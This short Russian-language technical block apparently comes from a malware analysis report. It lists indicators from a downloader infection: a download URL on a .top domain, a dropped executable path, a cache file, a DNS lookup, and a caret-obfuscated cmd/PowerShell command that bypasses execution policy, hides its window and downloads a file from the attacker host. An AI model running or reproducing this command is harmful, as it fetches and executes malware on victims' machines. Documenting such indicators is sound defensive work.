Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOwe^R^SH^ElL.eX^e^ -ex^E^CUTi^O^n^po^lICY b^y^pA^Ss ^-^noProfI^le -^win^dO^WStY^l^E^ H^id^De^n^ (^ne^w^-^o^BJ^ec^T sYsT^Em.N^eT.we^bCLi^e^N^T).doWn^l^O^aDFI^L^E('http://toa...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "pOwe^R^SH^ElL.eX^e^ -ex^E^CUTi^O^n^po^lICY b^y^pA^Ss ^-^noProfI^le -^win^dO^WStY^l^E^ H^id^De^n^ (^ne^w^-^o^BJ^ec^T sYsT^Em.N^eT.we^bCLi^e^N^T).doWn^l^O^aDFI^L^E('http://toa... (со скрытым окном)